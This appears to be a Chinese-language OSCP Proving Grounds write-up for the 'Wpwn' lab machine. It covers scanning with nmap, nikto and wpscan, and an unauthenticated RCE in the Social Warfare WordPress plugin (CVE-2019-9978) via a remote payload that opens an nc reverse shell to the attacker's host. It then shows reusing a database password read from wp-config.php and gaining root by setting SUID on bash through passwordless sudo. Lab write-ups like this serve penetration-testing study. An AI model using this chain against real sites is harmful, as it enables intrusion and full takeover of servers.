OSCP - Proving Grounds - Wpwn

主要知识点

  • 路径爆破
  • wordpress插件RCE
  • 明文密码
  • sudo 提权

具体步骤

信息收集

nmap扫描

比较直接,22和80

复制代码
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

nikto扫描

发现了robots.txt和wordpress路径,但是robots.txt毫无价值

复制代码
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.151.123
+ Target Hostname:    192.168.151.123
+ Target Port:        80
+ Start Time:         2025-04-27 19:23:06 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.
+ /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.
+ /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.
+ /wordpress/: Drupal Link header found with value: <http://192.168.151.123/wordpress/index.php/wp-json/>; rel="https://api.w.org/". See: https://www.drupal.org/
+ /wordpress/: A Wordpress installation was found.
+ /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /wordpress/wp-content/uploads/: Directory indexing found.
+ /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
+ /wordpress/wp-login.php: Wordpress login found.
+ 8102 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time:           2025-04-27 20:14:56 (GMT-4) (3110 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

wpscan

执行wpsan,在结果中发现了有漏洞的插件social-warfare

复制代码
[i] Plugin(s) Identified:

[+] social-warfare
 | Location: http://192.168.151.123/wordpress/wp-content/plugins/social-warfare/
 | Last Updated: 2025-03-18T09:37:00.000Z
 | [!] The version is out of date, the latest version is 4.5.6
 |
 | Found By: Urls In Homepage (Passive Detection)
 | Confirmed By: Comment (Passive Detection)
 |
 | [!] 8 vulnerabilities identified:
 |
 | [!] Title: Social Warfare <= 3.5.2 - Unauthenticated Arbitrary Settings Update
 |     Fixed in: 3.5.3
 |     References:
 |      - https://wpscan.com/vulnerability/32085d2d-1235-42b4-baeb-bc43172a4972
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9978
 |      - https://wordpress.org/support/topic/malware-into-new-update/
 |      - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
 |      - https://threatpost.com/wordpress-plugin-removed-after-zero-day-discovered/143051/
 |      - https://twitter.com/warfareplugins/status/1108826025188909057
 |      - https://www.wordfence.com/blog/2019/03/recent-social-warfare-vulnerability-allowed-remote-code-execution/
 |

打破边界

获取www-data用户权限

直接参考下面link的描述Social Warfare <= 3.5.2 -- Unauthenticated Remote Code Execution (RCE) | Plugin Vulnerabilities

在本地目录下创建payload.txt,内容为

复制代码
<pre>system('rm /tmp/f ; mkfifo /tmp/f;cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.45.217 443 >/tmp/f')</pre>

本地启动server和nc -nlvp 443后,访问 http://192.168.151.123/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.45.217:8000/payload.txt

便可获得reverse shell,也可以在/var/www路径下获取到第一个flag

复制代码
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.151.123] 37504
bash: cannot set terminal process group (517): Inappropriate ioctl for device
bash: no job control in this shell
www-data@wpwn:/var/www/html/wordpress/wp-admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

权限提升

获取takis用户权限

接下来上传一个linpeas帮助枚举Linux信息

发现了一个比较有用的数据库配置文件,其中包含一个密码

复制代码
www-data@wpwn:/tmp$ cat /var/www/html/wordpress/wp-config.php
cat /var/www/html/wordpress/wp-config.php
......
......
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress_db' );

/** MySQL database username */
define( 'DB_USER', 'wp_user' );

/** MySQL database password */
define( 'DB_PASSWORD', 'R3&]vzhHmMn9,:-5' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );

/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );

经过尝试,我们可以得知改密码属于takis用户

复制代码
www-data@wpwn:/tmp$ su takis
su takis
Password: R3&]vzhHmMn9,:-5
id
uid=1000(takis) gid=1000(takis) groups=1000(takis),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

并且该用户可以无需密码执行sudo

复制代码
sudo -l
Matching Defaults entries for takis on wpwn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User takis may run the following commands on wpwn:
    (ALL) NOPASSWD: ALL

所以提权成功

复制代码
sudo chmod +s /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash
/bin/bash -p
id
uid=1000(takis) gid=1000(takis) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),1000(takis)
cat /root/proof.txt
1c7593989911e8bc71c50609491b6166
cat /var/www/local.txt
4c07c5f1165c40d6be363891b297dca4
相关推荐
CertiK5 分钟前
IBW 2025: CertiK首席商务官出席,探讨AI与Web3融合带来的安全挑战
人工智能·安全·web3
m0_738120722 小时前
玄机——某学校系统中挖矿病毒应急排查
网络·安全·web安全
帽儿山的枪手2 小时前
为什么Linux需要3种NAT地址转换?一探究竟
linux·网络协议·安全
leagsoft_10039 天前
联软科技入选《新质·中国数字安全百强(2025)》专业领域榜单,斩获“领先者”称号
科技·安全
浩浩测试一下9 天前
渗透测试指南(CS&&MSF):Windows 与 Linux 系统中的日志与文件痕迹清理
linux·运维·windows·安全·web安全·网络安全·系统安全
安全系统学习9 天前
【网络安全】DNS 域原理、危害及防御
算法·安全·web安全·网络安全·哈希算法
二闹9 天前
擂台赛:图形老将 VS 短信新秀,谁更抗揍?
javascript·后端·安全
ALe要立志成为web糕手9 天前
Kubernetes安全
安全·web安全·网络安全·k8s·云安全
2501_915921439 天前
后台发热、掉电严重?iOS 应用性能问题实战分析全过程
websocket·网络协议·tcp/ip·http·网络安全·https·udp
DeepPhish9 天前
【钓鱼预警】针对跨境销售投递Tesla间谍木马
网络安全·钓鱼邮件·安全意识·eml分析·反钓鱼